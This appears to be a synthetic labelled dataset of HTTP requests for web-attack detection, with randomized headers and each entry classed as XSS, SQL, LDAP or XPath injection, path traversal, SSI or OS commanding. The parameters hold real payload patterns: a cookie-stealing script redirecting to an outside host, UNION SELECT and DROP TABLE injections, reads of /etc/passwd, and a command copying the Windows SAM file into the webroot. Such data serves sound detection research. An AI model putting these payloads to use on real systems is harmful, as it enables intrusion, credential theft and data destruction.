TE: trailers,trailers
Trailer: Upgrade
User-Agent: sbupseeH
UA-CPU: PowerPC
UA-Disp: 010,645,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: 3.9 227.78.59.36:68246
Transfer-Encoding: gzip
Upgrade: bletts/8.4, eawgt/6.8, sXn/8.3, sei0e/5.7
Warning: 051 11.28.159.211 "vuojxaosel7oelrcfSe" 
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44136
Start - Id: 47428
class: XSS
GET /exSIG0T/7PMs5w6w71qWm/0qbaO50oeh8reO/ekUcGqX/aLPr4YmL7/onn6sd2tg/hseoo/5KLLCRuzu98DmV8/o77fowmnetc/lkGO9z52h4.html?pin=296&martrk5=nEos9jnfiifer&aTi=oAhodsSnnire&A1mos=029882697&kXexsl=hSql&3tl=Eetihweee&eeij1pdPtseaoE=4t%5Didr%3D%5Boer%27lw%3Bsui&zlaSdUiAamtsnmt=%3Cimg++src%3D++++%22+++li++%22onmouseover%3D++++%22++++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.roonri.com%2Fcgi-bin%2Flalanailtr.cgi%27%2Bdocument.cookie%29%3B%5D++%22++%3E&T6=bLk HTTP/1.1
Host: www.zsoeb.fr
Connection: keep-alive
Accept: audio/*, video/quicktime;q=0.6, audio/x-wav;q=0.8
Accept-Charset: windows-1252, windows-1258, x-mac-chinesetrad;q=0.4, utf-7
Accept-Encoding: gzip, gzip;q=0.0
Accept-Language: H6Ziioe-sohEem, dol-tuNt;q=0.2
Cache-Control: min-fresh=41480
Client-ip: 225.48.136.105
Cookie: aife8ohhfc=50558
Cookie2: $Version="05"
Date: Wed, 11 Feb 09 12:25:40 CET
ETag: "QkPnsGdJe177PaIh12u"
Expect: 100-continue
From: 0hOsn@ivHe.ch
If-Modified-Since: Tue, 09 Feb 10 20:36:11 UTC
If-Unmodified-Since: Sat, 09 Dec 06 24:36:53 GMT
If-Match: *
If-None-Match: "3eCfif6oUVuHRsE"
If-Range: Sat, 21 Oct 06 22:13:07 GMT
Max-Forwards: 3234
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Basic ZVJkN2g6b2FsMw==
Authorization: tslI axset=cheinryn
Range: 264348-7,043051-,50446-892
Referer: http://www.nyihSo.gov/ay9Y/Z8vrozwr/4sRr48ac/bpcinA.css
TE: deflate
Trailer: Referer
User-Agent: 81mzke/5.3.8.1
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: 5.1 www.asey6o.jpeg, 8.0 www.Oantu.gif
Transfer-Encoding: identity
Upgrade: 26e/0.8
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 168.182.251.139
X-Serial-Number: 79894871032971877602
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47428
Start - Id: 41816
class: SqlInjection
GET /V28E2rAARW6/fdtHJioruTeroefa/hIRmJmm.bin?sf7=363&eetdnbes=902971&xk3a0jinss=hle%5Daidbf%25uu&eaaaunorrIZy=%7Eea&s0p=u4I27mgpotn&msieet1soans7g=%27++%29++++UNION+++ALL++SELECT+++++frtam4se++++%2C++++1ht4mo+++++%2C+++Da+++FROM+++++reinwntI++WHERE++++a2cslqe++NOT+IN++%28+%27ruelahMilc%27+%29+++++AND+++++TdeLc+++NOT+IN+%28%27fre3utot0m%27%29+++++AND+%27%27++%3D+%27&sie4e=ehtvbscript&ntidu=57 HTTP/1.0
Host: www.t3hnss.cz
Connection: close
Accept: image/jpeg
Accept-Charset: iso-2022-kr;q=0.8
Accept-Encoding: 
Accept-Language: a2ioeaew-n76our, 4e-t0qpiatm
Cache-Control: or='t'
Client-ip: 209.250.197.168
Cookie: UeoEOautda=14;dlmn8obDm=eenorileentnhh3Nm;689YvRH6U2Z3=364407;odrEdn8eri1at=w f6a
Cookie2: $Version="3"
Date: Wed, 21 Jun 06 21:20:20 CET
ETag: "Dd5MBEp1RkTm.bHVt"
Expect: 100-continue
From: t9iXwsen@4teno.be
If-Modified-Since: Thu, 06 Apr 06 21:41:49 UTC
If-Unmodified-Since: Thu, 17 Feb 05 09:30:11 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 17 Apr 05 21:11:18 GMT
Max-Forwards: 5872
MIME-Version: 8.0
Pragma: Tntuns=to
Proxy-Authorization: NTLM N2h5aXNYcjhuZWxvOXFrMWFpb3RkcHNybHdmYmFjb2VlaGFz
Authorization: NTLM czB1NG9hYjd0b3RmcnQ4ZWRlZW5venRpNGVyZWl6c254YXNlZXpmbg==
Range: 340098-821
Referer: /mtudlt/aeE5/esssex/hraid.pl
TE: trailers
Trailer: Max-Forwards
User-Agent: leen49nre/1.4.4
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8410x009
Via: 3.6 58.183.71.51, FTP/4.8 www.xskoNNlo.jpg, FTP/1.2 www.cuejay.jpeg
Transfer-Encoding: compress
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 34361564811
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41816
Start - Id: 36316
class: PathTransversal
GET /o57M.qEvbU/tndqghwiinianrrnSuy/Wbody2WSZ_/Sua7tsetRND7eny2S/eyMaraaace8lbe/rbdutn57ac/s6Q5gs/aygc5tifsvM3iNhseezn/hnsSqeAsreaife09/zXPhD/YoKzOYmu./sbAIgtSouM2.cgi?iso22ijia=eHs7mWsYs2g&netrpoleiihr=ftp9%28w0%28+Z+nt%3Eaacopyetot&rcD4tiumsihn3=1312427&tombtnd3=cseeBEnofuneellh&mow1zsebaefe=enrnrNeteeore2Or&qQNgGcJp=se%2B&CnullR5wy=%2Fetc%2Fpasswd&hHrdhewn=%3Dnsga48lnoAip+&sxty=tmpfEms HTTP/1.0
Host: 221.113.230.254:216
Connection: CboIoyim
Accept: audio/x-wav;q=0.4, text/html
Accept-Charset: euc-jp, x-mac-ce, iso-8859-8
Accept-Encoding: identity;q=0.4
Accept-Language: *;q=0.1
Cache-Control: max-age=5
Client-ip: 204.44.253.203
Cookie: fqdelwee=atW_btF6h
Cookie2: $Version="628"
Date: Mon, 17 Jan 05 08:51:31 CET
ETag: W/"XVnSSkhMGncEq258"
Expect: 4soo
From: 5ygo@eiccrasaq.org
If-Modified-Since: Wed, 02 Apr 08 12:47:33 CET
If-Unmodified-Since: Sun, 13 Feb 05 11:42:06 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 17 Jun 07 01:12:05 CET
Max-Forwards: 72
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: tioya ejsnoe=rrNti
Authorization: Basic YXRmMWllOnNocnRmNG4=
Range: -607068
Referer: /wweiekh/durd.mspx
TE: trailers
Trailer: User-Agent
User-Agent: vu5o/8.5.4
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 645x5981
Via: HTTP/7.3 www.noq5li.htm, FTP/2.7 www.ebelb.tiff, 6.4 www.ehrtqwn.css:858
Transfer-Encoding: identity
Upgrade: saanei/2.6
Warning: 925 www.seESe.gif "aoh3bha8hrc" 
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 10989646571343616
----: -------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36316
Start - Id: 41954
class: SqlInjection
GET /iHjBbSYSoSDHRTjS_M-I/xBAZwUm/weemce08dheetor/iNB4I2oR2.html?rops9UaeeJe=o4fe&lsisaysrwVaq=9825564800&nooee2ec=51078418&n8ikynhHh7=Yunei2nzoapow&sy5eeJot5o=rcEnaoqo5m&wuAnyq=5boltstr&replaceLK7_=71012&adf2ycln=tneaii&puetdw=hsx+ua&ihsitsynhbdH=73087&eST1ia0thjtsrw=22784169&sfem=%27%3Bdrop++table+++osbrwn&jaIcc2heavav=+net&p3ENj3BCL=82804 HTTP/1.0
Host: 116.146.68.197
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: identity, compress;q=0.5, compress;q=0.6, gzip;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 54.102.14.216
Cookie: hbrokFreyn=90284517;hoeaaJs=6o;e7cniuamskhn=nee9AOsTctaetsta6;dgleoI=7
Cookie2: $Version="80"
Date: Thu, 02 Sep 04 10:41:34 GMT
ETag: W/"L5smUaADBs4uUok.30rh"
Expect: 2eweYa=sefI;hdtn
From: lbrsawDh@elfoa4b.fr
If-Modified-Since: Fri, 17 Apr 09 02:17:04 GMT
If-Unmodified-Since: Thu, 08 Oct 09 16:46:05 GMT
If-Match: "OBy5pzLa3VKUh5_eB0u_"
If-None-Match: *
If-Range: "9r9VXT1jxARkjhw_HfrP"
Max-Forwards: 4540
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic MW5lYW1OdG46YXN0bHRlbnI=
Authorization: Digest username="aEmaxdo"
Range: 55660-
Referer: /wldjdfdl/ksoTs9r/uodwhT/Ehe6nyk/rmono.txt
TE: trailers
Trailer: Connection
User-Agent: iladdgs/3.6.7.7.8
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1383x317
Via: HTTP/1.5 www.hnd0o.html, FTP/2.4 88.227.154.124:765
Transfer-Encoding: compress
Upgrade: ep1Mri/9.9, tcn/2.5, elb8/5.8, eeNie/7.6
Warning: 380 180.68.76.182:324 "6hooeiOocsdeo" 
X-Forwarded-For: 116.82.96.232
X-Serial-Number: 41242078999326437
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41954
Start - Id: 40765
class: SSI
PUT /h2/obgjzFqIt/@jSIS90d5nullB-Y/mPkVPld/En/ZClk/kclIGS/eLuihh/2PiCGwmYqG8u3cy5/tcR.Y.sh? HTTP/1.0
Content-Length: 157
Content-Language: unnHiu
Content-Encoding: deflate
Content-Location: http://www.ddoO.uk/6iSWtsw/anut/ehtdtn/euhsi/cep3oct.tar
Content-MD5: cTI4c25pcmxlc3RjZGdybw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Feb 04 12:58:49 CET
Last-Modified: Fri, 11 Jun 04 23:37:49 UTC
Host: 71.234.24.232
Connection: close
Accept: text/*;q=0.2, image/*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: Oaec-e, swh-h5s2k2k, p9nb-h6he5, s-qsohc;q=0.4, pt-xeGS0oON
Cache-Control: max-stale=3
Client-ip: 166.41.33.129
Cookie: wda9otccrrhiezr=o
Cookie2: $Version="05"
Date: Sat, 10 Apr 04 15:39:19 UTC
ETag: "-mDaC72APAXSOUm"
Expect: neiat
From: tt33en@1osNNfn.biz
If-Modified-Since: Tue, 11 Dec 07 05:32:55 UTC
If-Unmodified-Since: Sun, 10 May 09 07:45:20 CET
If-Match: *
If-None-Match: "z0laz.ruwPweKf_QTK"
If-Range: Sat, 21 Oct 06 10:13:07 GMT
Max-Forwards: 8565
MIME-Version: 8.0
Pragma: rse='8'
Proxy-Authorization: NTLM SW5hcmx0ZTA2Zmk3ZWt0bGUxZW50aHNpaFJvcm5wc2llZWFlZXVkbmF0cWxh
Authorization: cOss ctpiFe=shtetAe
Range: 21211-
Referer: /LRet6ii/hnaao/etdsh9b.zip
TE: trailers,chunked;q=0.4
Trailer: Max-Forwards
User-Agent: omasxwdt (x6s2OTfo; cg@xQw0; uL1iaI2; m95afIdw)
UA-CPU: 68000
UA-Disp: 442,6070,32
UA-OS: Win98
UA-Color: color16
Via: 3.3 52.26.160.47:7, 8.3 www.icuTqst.shtml, 6.4 www.IbuaLe.css
Transfer-Encoding: compress
Upgrade: rhe/3.3
Warning: 515 255.26.146.194 "etiqarDie" 
X-Forwarded-For: 31.100.82.188
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

HDUK5=902620912&Jsan7h9=areeshtxaigs&iymdr=<!-- #odbc     connect="ly3hag,nSgi,nta3h"        statement="select    *    from     u"-->

End - Id: 40765
Start - Id: 38936
class: LdapInjection
GET /oploEzenv/hnazh/hwu/neueoxzxuaRa4x/@services.gif?4biegsie=%25eeOacestng&ReScuroaoonrac8=pde1te3oouj7&aIWPtVH=67&ol=vfuelnaLqe7aO&mgyLfe3vNA=igY419txX1j&fQoM=njp4r%3Ftoftpoe2t&sshoh=AbbgThr2ibas&_6U8oKiaZox=sXlu3A7G35&mzm9ld9=iod&Esfrota4=%29+%28%7C+%28displayName%3Dhad*%29+++%28name%3D+had*+++%29%28+++mail%3Dhad*++%29&eertteN=e8ttuiydOqoAasil0&tFshutdown9vmailDexecncFNv=65&hcrezftu=5964473&ri=eschildb HTTP/1.1
Host: 108.71.151.134:80
Connection: keep-alive
Accept: text/*;q=0.9, text/plain;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: gzip
Accept-Language: *;q=0.6
Cache-Control: min-fresh=7406
Client-ip: 200.234.213.150
Cookie: @U9rIGot.TZH=t&;gMHNebolr=gbzhU;bhbnm=lvee1e2mhzfst$i;henaE7qlw=05030;tevgaZwfrihua=esupdate;cZ.Er6httpsgFprocessing-instruction=eoawget6psOhseuniont%vbscriptnu>|
Cookie2: $Version="0"
Date: Tue, 04 May 04 09:50:01 UTC
ETag: W/"LIYPMnLg-VgXRugAC"
Expect: 100-continue
From: Utnn8c@iodssieo.biz
If-Modified-Since: Tue, 09 Feb 10 14:40:03 UTC
If-Unmodified-Since: Wed, 12 May 04 02:37:56 CET
If-Match: "o9Erw-iZr47dkloUl"
If-None-Match: "WLraIsHqHIPb1eu"
If-Range: *
Max-Forwards: 190
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM NGloNUVlOER0YWFvb2dlMHRBZnZuR3RlczZodDJkaWVoc0Ruc2I=
Authorization: NTLM OW5kOXl0YXNtaFdpaG90ekx3RnQzdWtsZHE0cnZFSXROZWJka24xbXNvZ25yZQ==
Range: 19115-,-68,486-99
Referer: http://oehrf.biz/otR9e/oHea/5r3q/netgp/runty.html
TE: trailers,gzip;q=0.4
Trailer: Host
User-Agent: reoiote/5.9.4.2
UA-CPU: 68000
UA-Disp: 8172,5109,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7088x099
Via: 4.0 www.Mehhis.js:0005
Transfer-Encoding: treihe; ttti0=ddIrm
Upgrade: nocAo/1.3, tgd/7.3, c3isen/9.2, BaeeL/8.6
Warning: 490 107.236.240.80 "Ol4tn7eejtras" "Mon, 14 Jun 04 07:29:54 UTC"
X-Forwarded-For: 212.86.228.108
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38936
Start - Id: 44689
class: PathTransversal
PUT /cYn_g/6rsle7rBsaaa/1tlbfrgVGCApsG/dpCJMjLirp/etdSvQWaJ_2k/nsf/zycotiZ2ieeh.asp? HTTP/1.1
Content-Length: 223
Content-Language: de5tanhS
Content-Encoding: identity
Content-Location: /ef1Fd/tzssesoh.ace
Content-MD5: cnNvbnJ5czlqbm90c3NjYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 10 Nov 04 02:59:12 GMT
Last-Modified: Fri, 08 Dec 06 03:25:33 CET
Host: www.iTeshtafbb.org
Connection: close
Accept: */*;q=0.9
Accept-Charset: cp-950, x-mac-korean;q=0.7, x-mac-chinesesimp;q=0.3, windows-1250;q=0.6, euc-jp;q=0.2
Accept-Encoding: 
Accept-Language: itebrb-T9tosNh;q=0.7, 2cnecx-esosist;q=0.4
Cache-Control: min-fresh=3027
Client-ip: 113.128.122.99
Cookie: bmglfmUhnlI=erDD3;hitcsAwRhye=Dtn4j fg;wzisati73p4gsr=38231755
Cookie2: $Version="657"
Date: Wed, 04 Jul 07 05:51:03 UTC
ETag: "KMnuhyHCL6pclcSzCXiL"
Expect: saene=nf9tcCm
From: nC0otao@cuVsd.gov
If-Modified-Since: Wed, 02 Jan 08 01:23:29 CET
If-Unmodified-Since: Tue, 01 Dec 09 16:18:34 GMT
If-Match: *
If-None-Match: "dr7q60SUwfpocpkYSr6"
If-Range: *
Max-Forwards: 88
Pragma: no-cache
Authorization: Digest nc=F2bf69C0
Range: 2168-,8-1607,73-
Referer: http://www.ediepIm.fr/Hnen8xo/F1gbwit/utdoL/essi/ees2NA64.sh
TE: trailers,gzip,deflate
Trailer: Cache-Control
User-Agent: oamksdw/1.8.8
UA-CPU: StrongARM
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 562x3540
Via: hanpe/3.4 www.nFerirey.html, Ahi/0.3 231.207.250.1
Transfer-Encoding: gzip
Upgrade: 2dgtes/0.6
Warning: 868 www.gmor.js "Hn5xrhit" 
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 175251
----: ------------------------

twrte9a=cse<l&aimuaeN=../../../usr/dsqqdsqsd.xml&ioeretIe=58&r8e9eLPrd8lwo=lllo6ewutrw0ipmoq&ywaokAte0ieotn=9&odrsmryl=0680&nob=esljEayplt4u2e&7uIinput0K=e7ti&tIwp-6=m'srai@yJ(Sd &-ytNjScQ=519396&tsnoofas=27

End - Id: 44689
Start - Id: 45951
class: PathTransversal
GET /b5/@eQ6OqrnodeE/tndrooa6rtlOjnt/jhHKtPoMepMrti4Lh.gif?sn=link5y5eoycj%2F&eat=eEV5xN&wnenmal=uObixR9x&Acetcc8ty=HocwiQiclstdino&bsoLtT=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Ferin%2Fmendsili%2Fsiorannans%2Franide.jsp HTTP/1.0
Host: 13.78.143.82
Connection: tIff
Accept: video/*;q=0.6, image/png;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hl-ycfo4zb;q=0.8, wpl-omodl;q=0.3, nE-en8lAs, ucl9sb-8imnjosl
Cache-Control: max-stale
Client-ip: 81.34.102.44
Cookie: gbycitApalyj=92
Cookie2: $Version="028"
Date: Sun, 19 Mar 06 12:49:48 UTC
ETag: W/"Jy54JyeN5DvDzJBlnR"
Expect: e8ch
From: cpanabu8@leeWhlh.biz
If-Modified-Since: Wed, 19 Apr 06 09:42:23 CET
If-Unmodified-Since: Mon, 15 Mar 04 17:52:20 GMT
If-Match: "q2foPSNk1I8q8EYxL"
If-None-Match: "SQSVrLo@hA7gC1L10"
If-Range: Fri, 30 Apr 10 21:46:22 GMT
Max-Forwards: 91
MIME-Version: 5.8
Pragma: lots=Ehtegor
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Basic d2ZvaHRrczplR25scm9lcw==
Referer: /mnhmnw/t9E51/tbrNk/unssete.dll
TE: deflate;q=0.7,trailers,deflate
Trailer: Accept
User-Agent: sso3n9new (iRM6XGKw)
UA-CPU: x86
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
Via: 7.5 www.ngsae.css, 9.0 www.e7sto3m6.js
Transfer-Encoding: deflate
Upgrade: ihmRi/3.1, csAMi/2.6, ruqry/0.0, hejq/9.2
Warning: 240 244.77.211.173 "osnMh" 
X-Forwarded-For: 79.119.72.4
X-Serial-Number: 6933322511
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45951
Start - Id: 49653
class: XPathInjection
GET /ibr3ptcdeH/6oosh5e.jsp?hts5amfto9ei=58&YihFwp-OnFy2k=ear0cnrr0xtt&hsdc=aovwUyFxsCJk&rblhtacces.usrzjQY2=tbmaccess_logOi&ehGEEr=06++++or+ro5%2Fhpa%2FeEpa%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D594%5D++++or+++++45408%3D&1eobjbwhtrE=eEn&u4iepo4shooeh=rinhpnae%26roacai&m6yTYu60Itsj=nidad6sCn&ebbfmD=4&alned3mzls=cnalse HTTP/1.1
Host: www.fetennakre.ch:80
Connection: keep-alive
Accept: video/*, audio/*, text/html
Accept-Charset: cp-950, iso-8859-4;q=0.5, us-ascii;q=0.2, x-mac-arabic, euc-cn;q=0.4
Accept-Encoding: compress, gzip;q=0.0, compress;q=0.5
Accept-Language: ltpm-a;q=0.2, y-6n
Cache-Control: max-stale
Client-ip: 135.193.196.43
Cookie: einwa1ofmLl=0;caecahonhe5=4mpsz;ueegtk1oFeastt=y1th4lS1;7s=eq0ie
Cookie2: $Version="00"
Date: Sat, 12 Apr 08 10:31:25 GMT
ETag: "XG5vP6R7j2LObHQwr_qp"
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Tue, 02 Sep 08 15:32:59 GMT
If-Unmodified-Since: Fri, 18 Jan 08 24:43:53 UTC
If-Match: "VD0GHtMTXYtqDPIn0"
If-None-Match: "oVmYmNEUdktryqEd_8"
If-Range: Sat, 11 Mar 06 22:01:13 CET
Max-Forwards: 5921
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest uri=http://mna4agle.it/ahffsu/so9n/rtiEyi0e/miafb/toahlqn.pdf
Range: -377,00-3
Referer: http://www.esd5le.it/ht2t/tanlaew/Scamac/AarOwji/sjzrr.mpeg
TE: trailers,gzip;q=0.6
Trailer: Via
User-Agent: Mozilla/6.5 (Windows; U; Windows NT 6.6; e7-bb; rv:9.4.0) Gecko/92993245
UA-CPU: PowerPC
UA-OS: Windows NT
Via: tit3a/4.8 188.75.119.134
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
X-Forwarded-For: 18.19.238.4
X-Serial-Number: 6227960024150
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49653
Start - Id: 38536
class: LdapInjection
GET /aIac7z6GgI/7@0@g6rsJUc4F0bwLil/og24acwolut8E.cfm?uJYJIe5OyvLE=%29+++%28+%7C++++%28displayName%3Dhad*%29++%28name+%3D+had*+%29%28+++mail%3Dhad*++%29&I1c-wJ9Ht=+pxterm+n+66delete3riatifgsge&hfadnpce=803&exd=9icteurSieIe&zOSposition9_HhttpNT6=et3+%3D&tNe=mgts&si=aeftphfromr%5Ck&tshoyatnexidy=tmpraiaeTanh&positionR128kTh=tnbetweenexec2dTAf%7Cousus1l&eHaye3Ta=441532&vekWlceed0f=sr&connecthY7ElQ=tywdeletesock_streams+idwinnt-a&vofsN=r8wC-%402&Rdioli4tHtsnh=rtateervaObahhtzr&7shc4hr56r3etE=osrgy+ HTTP/1.1
Host: 0.231.47.216:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: aooc-ioek2ws;q=0.2, aottwN-ief;q=0.0, Ao-nSEut8i;q=0.5, n-p, A-1Cl;q=0.5
Cache-Control: max-age=3879
Client-ip: 101.131.250.156
Cookie: 9tnoAdueLs=uandn<;hkws=2;S7bfs6i=st%;Li.-YnI=46293
Cookie2: $Version="187"
Date: Wed, 11 Oct 06 13:39:00 CET
ETag: "isirvvJoG96lB0_5"
Expect: 100-continue
From: teee@ahlrhcs1d.org
If-Modified-Since: Thu, 16 Apr 09 19:56:01 GMT
If-Unmodified-Since: Thu, 28 Jul 05 23:59:25 GMT
If-Match: "z8DLD_b.OnZo@UGJk"
If-None-Match: "OwmyPRMGmUcX_0.n"
If-Range: Tue, 30 Mar 10 05:24:32 CET
Max-Forwards: 2
MIME-Version: 8.2
Pragma: zui=rnsrd
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: Digest username="i0ypan"
Range: 447-,158917-
Referer: http://www.easIaj.biz/Rm7iXe.jsp
TE: deflate,trailers
Trailer: If-Range
User-Agent: Mozilla/9.0 (X11; U; Open BSD i386 3.3; 0n-h0; rv:1.0.5) Gecko/19344706
UA-CPU: MIPS
UA-Disp: 967,395,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8726x4401
Via: HTTP/8.1 www.aOgo.htm, 1.8 www.odCou.jpg
Transfer-Encoding: compress
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 494 103.11.37.183 "1br62beg" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38536
Start - Id: 39392
class: SSI
GET /i3aCz_jEc_/eiJahdwD/z1smt/d9xnCD@FIe/mbxo6@C/nsawoodIr7cnmrnhual/CVm@z8/uFIp3vHR5W.html?OtJysyl2m9ai2tA=i6st&3AZ34.dE=%3C%21--%23email+fromhost%3D%22www.r7l92loD.com%22+tohost%3D%22mailbox.nodu2.com%22+message%3D%22teiiy4+frsettz+htar0Fl+tdeam%22+fromaddress%3D%22rerz.com%22+toaddress%3D%22old.ot.com%22+subject%3D%22ed%22+sender%3D%22jt.com%22+replyto%3D%22Aaa0en5.com%22+cc%3D%22HZr%22+inreplyto%3D%22zq+sIe+qj%22+id%3D%22ww9pmail%22+--%3E HTTP/1.1
Host: www.sdg5.de
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-7;q=0.2, iso-2022-kr, cp-936;q=0.0, windows-1257;q=0.6
Accept-Encoding: 
Accept-Language: h-s, a4r8ua-q6a;q=0.8
Cache-Control: no-transform
Client-ip: 247.66.9.211
Cookie: asbcdRosmh2jioI=<n;GdnuroRyo=IaaEict;r53=Seo
Cookie2: $Version="42"
Date: Mon, 29 Mar 04 21:58:06 UTC
ETag: "R.rwHg_U5I3k9lbI.yb@"
Expect: 100-continue
From: 2taerbd@7tinee5s.fr
If-Modified-Since: Wed, 30 Nov 05 18:41:36 GMT
If-Unmodified-Since: Thu, 19 Oct 06 03:47:29 CET
If-Match: "7dib_yx3TyIHlsll-b"
If-None-Match: *
If-Range: *
Max-Forwards: 82
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: reenr ueer=altyt2
Authorization: Basic bHRzaWV0dGU6bWVpcnM5
Range: 32-500
Referer: /atrlhEb/ksrane2/toe31.nsf
TE: chunked;q=0.8,deflate,deflate;q=0.7
Trailer: Accept
User-Agent: ltaize (iSlVw26Z; eXyd1.; s3i0qg; e7mQDX; sAscEywhV0)
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 696x8409
Via: 0.2 124.162.206.142, 8te/4.0 www.to9hhxn.shtml, 8.2 www.ei5nemn.shtml
Transfer-Encoding: moig
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 546 www.raiagiki.htm "ohfiere5i" "Sun, 09 Jan 05 20:08:05 UTC"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39392
Start - Id: 42852
class: OsCommanding
GET /7.1wUaxgD/0FV41.jpg?nljnp1axncuBdn=572730847&FolirOyltTelts=7nqxCncxiu8t&sqw=hZcd&ar=somailh2Ianrx2&advtn1=reEyoptitEt0ta&FinsertfromS=hMw%29tNtxinputwamsSasnzn&ihaesw9rAikHls=vyae&lzuer=es8Seelinkh%5Daaq7ae&XvaGU=ei1&et5nm15uostve=7eqEej5oy2m%268&iNadceltiuorrse=6d&awf=ExHhn&@bodyt5ilmUFDWB=m%2Bte&aNa7TfR=126.136.27.77++%7Ccopy+c%3A%5Cwinnt%5Crepair%5Csam._+c%3A%5Cinetpub%5Cwwwroot%5Csam.ddd&bZamrB2vur7ik=84089 HTTP/1.1
Host: 169.77.199.206
Connection: close
Accept: image/jpeg;q=0.5
Accept-Charset: big5
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-stale=33
Client-ip: 143.230.118.47
Cookie: AChMW=6084;nt=Ctna;mRhbJNaOsdnEe=96908;soehi=;/Smuvlibhle-wp-isi;u5sxnf=0;cHnetxgeas=43
Cookie2: $Version="840"
Date: Thu, 31 Jan 08 17:56:41 GMT
ETag: "Hojpf2RJeeu_ocT8l6Gw"
Expect: 100-continue
From: l6tz5hd@ruglhe.be
If-Modified-Since: Wed, 22 Oct 08 08:12:22 CET
If-Unmodified-Since: Fri, 15 Sep 06 10:12:28 UTC
If-Match: "fkLSiJSki10kEDYFuWrs"
If-None-Match: *
If-Range: Wed, 11 Jun 08 01:13:43 UTC
Max-Forwards: 1448
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: njdei gtdN=st7gs
Authorization: Basic bm9kZGRzc2c6b2FiYkY=
Range: -885,-18051
Referer: /yyja.tar
TE: chunked;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.6 (Windows; U; Win 9x 8.7; en-ox; rv:9.2.3) Gecko/20903876
UA-CPU: Sparc
UA-Disp: 7817,3346,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 625x3364
Via: HTTP/7.7 www.4aina.css, FTP/8.2 www.sh4tee.jpeg, HTTP/9.9 www.asFvet.css
Transfer-Encoding: ehlbn8
Upgrade: Rhetio/0.3, d5nIg/4.3
Warning: 831 253.234.94.229 "urhmxsr8a0ucgtYcTaym" "Thu, 10 Mar 05 12:24:31 GMT"
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------
